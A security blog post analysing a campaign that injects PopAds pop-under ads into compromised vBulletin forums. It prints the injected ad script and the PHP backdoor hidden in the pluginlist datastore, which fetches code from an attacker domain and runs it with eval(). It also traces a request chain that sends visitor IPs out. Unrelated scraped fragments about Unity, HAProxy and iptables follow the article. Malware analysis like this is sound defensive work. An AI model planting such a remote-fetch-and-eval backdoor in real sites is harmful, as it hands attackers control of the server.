Vbulletin Used to Show Malicious Advertisements

In the past, we have seen a massive amount of vBulletin websites compromised through theVBSeo Vulnerability. Attackers have been infecting vBulletin websites since 2012 with this malware, and more recently with a newvariation of the same infection. Ever since this new development, the table datastore in vBulletin has been a prime candidate for attackers to store malicious code where malware can be easily loaded on every visit.

Recently, we came across a malware campaign of vBulletin websites showing malicious ads from popads[.]net for no apparent reason. The webmasters had no idea where they were coming from. Pop-up Ads on vBulletin Forums

This ad network is well known for nasty pop-ups and malware-spreading advertisements as the core part of its network, which makes this a troublesome situation.

Here’s an example of the code being injected into the vBulletin sites:

<!-- PopAds.net Popunder Code for www.YourSite.com -->
<script type="text/javascript" data-cfasync="false">
var _pop = _pop || [];
_pop.push([‘siteId‘, 1514372]);
_pop.push([‘minBid‘, 0]);
_pop.push([‘popundersPerIP‘, 0]);
_pop.push([‘delayBetween‘, 0]);
_pop.push([‘default‘, false]);
_pop.push([‘defaultPerDay‘, 0]);
_pop.push([‘topmostLayer‘, false]);
(function() {
var pa = document.createElement(‘script‘); pa.type = ‘text/javascript‘; pa.async = true;
var s = document.getElementsByTagName(‘script‘)[0];
pa.src = ‘//c1.popads.net/pop.js‘;
pa.onerror = function() {
var sa = document.createElement(‘script‘); sa.type = ‘text/javascript‘; sa.async = true;
sa.src = ‘//c2.popads.net/pop.js‘;
s.parentNode.insertBefore(sa, s);
};
s.parentNode.insertBefore(pa, s);
})();
</script>
<!-- PopAds.net Popunder Code End -->

The code is quite easy to spot because it’s placed after the closing
</html>
tags. Most website security scanners would flag it as suspicious, and
strangely enough, it’s only being displayed once per IP. This means a
repeat visitor wouldn’t see the ads on subsequent visits.

Externalphp File Loading in Pluginlist

Knowing how vBulletin infections tend to store themselves inside the datastore
table, we went on to take a look at that table, more specifically in the pluginlist
row.

We found something that shouldn’t be there in the middle of the Tapatalk
code:

$output = preg_replace(‘@<link href="([^">]+)android-app:\/\/com.quoord\.tapatalkpro\.activity\/[email protected]‘,
‘<link href="android-app://com.quoord.tapatalkpro.activity/tapatalk‘, $output);
$output = preg_replace(‘@<link href="([^">]+)ios-app:\/\/307880732\/[email protected]‘,
‘<link href="ios-app://307880732/tapatalk‘, $output);
$config_data
=
file_get_contents(‘http://geekube(.)com/wp-content/uploads/2013/xml.php?a=inner&host=‘
. $_SERVER[‘SERVER_NAME‘]);
if(strlen($config_data) > 0){ eval($config_data); }
";s:14:"page_templates";s:106:"global $vbulletin;

Loading PHP files from external sources through the pluginlist
is never a good thing so it deserves further investigation. We took steps to simply mimic the requests in question.

On the first level of the request, the geekube(.)com
domain returns us with the following PHP file hosted on a malicious WordPress site:

$output .=
file_get_contents(‘http://geekube.com/wp-content/uploads/2013/uploads/sites/16b54149eeb067699ab60ce79aa44b9e/js.php?remote=‘
. $_SERVER[‘REMOTE_ADDR‘]);

We can see that the external script receives the visitor’s IP
address, which allows the malware to perform its conditional IP controls
and make detection harder. It also means we can easily spoof the
requests with a new IP to get to the next step.

By turning $_SERVER[‘REMOTE_ADDR’]
into a server IP for example, 192.192.192.192 the next script immediately returns the entire block of code for the popads
advertisement code we saw initially.
The first part of the request chain makes use of $_SERVER[‘SERVER_NAME’]
and now we can see why; the script customizes the code to make it look
as legitimate as possible by modifying the initial comment line:
<!-- PopAds.net Popunder Code for www.YourSite.com -->

The script will display the victim’s website domain in the comment line instead of www.YourSite.com
in an attempt to fool webmasters into mistaking it for legitimate code.

New Domains Being Used

A new domain involved in this campaign has been using the exact same mechanisms and requests images(.)imagenetcom(.)com

We suspect there will be other sites that also leverage this tactic against vBulletin sites.

It’s always important to keep an eye on the plugins you have on your
website. This is important in vBulletin due to the ease with which the
attackers can add custom code or calls to external scripts in already
existing plugins. This alone makes it difficult for a webmaster to
locate the malicious injection, unless constant reviews of the plugins
in use are done.

Integrity monitoring services
will also help you stay aware of any unauthorized modifications to plugins and files on your site.

If you suspect your website has been infected, we are alwaysready to assist you.

时间: 2024-12-08 07:28:49

Vbulletin Used to Show Malicious Advertisements的相关文章

[Unity 5.2] The imported type `UnityEngine.Advertisements.ShowResult&#39; is defined multiple times

unityAds报这个错: The imported type `UnityEngine.Advertisements.ShowResult' is defined multiple times google了一下,说是由于unit5.2内置了unityAds,不必再从asset store导入unityAds了. 但是如果导入了也可以用,只要将选中Assets/Standard Assets/UnityAds文件夹reimport一下,unity就能知道你是要用导入的unityAds了,就不会

&quot;Can’t be opened because Apple cannot check it for malicious software&quot; 解决方案

最近在安装mac版本的qq音乐,下载下来之后却无法打开.提示 Can’t be opened because Apple cannot check it for malicious software. 解决方案: 1.打开Finder 2.在导航侧面找到application 3.找到刚安装好的软件 4.右击,open 5.点击open即可打开 原文地址:https://www.cnblogs.com/wangzhihang/p/12085076.html

Android Fragments Advertisements

一个片段(碎片)是一个应用程序的用户界面或行为,可以放置在一个让更模块化的活动设计的活动中.一个fragment是一种sub-acitivity.以下是关于fragment的几个重要的点: 1,一个片段都有它自己的布局和自身行为有自己的生命周期回调: 2,在活动正在运行的时候,您可以添加或删除frament活动: 3,您可以在一个活动中组合多个片段来构建一个多窗格UI: 4,一个片段可以用在多个活动: 5,片段的生命周期与宿主活动的生命周期密切相关,这意味着当宿主的生命周期活动暂停,所有在活动中

App forensics

A friend of mine claimed that someone stole her personal data via hacking certain App. She installed that App several months ago and registered an account. The user information including name,phone number,birth date,address and e-mail address etc. Re

Indexing Sensor Data

In particular embodiments, a method includes, from an indexer in a sensor network, accessing a set of sensor data that includes sensor data aggregated together from sensors in the sensor network, one or more time stamps for the sensor data, and metad

How to remove a Trojan, Virus, Worm, or other Malw

bleepingcomputer (这网站直翻是哔哔电脑么2333 其实一直都觉得国外的杀毒优化软件还是蛮好用,就是动不动要钱(天朝劣根性... 国内免费就是各种绑定+广告,,不过金山用着还是满顺手的,清清垃圾什么的. How to remove a Trojan, Virus, Worm, or other Malware Dialers, Trojans, Viruses, and Worms Oh My! If you use a computer, read the newspaper,

Haproxy Configure File

---------------------- HAProxy Configuration Manual ---------------------- version 1.5.11 willy tarreau 2015/02/01 This document covers the configuration language as implemented in the versionspecified above. It does not provide any hint, example or

URI, URL, and URN

URI, URL, and URN A URI can be further classified as a locator, a name, or both. The term "Uniform Resource Locator" (URL) refers to the subset of URIs that, in addition to identifying a resource, provide a means of locating the resource by desc

iptables包过滤入门指南

1. Introduction Welcome, gentle reader. It is assumed you know what an IP address, a network address, a netmask, routing and DNS are. If not, I recommend that you read the Network Concepts HOWTO. This HOWTO flips between a gentle introduction (which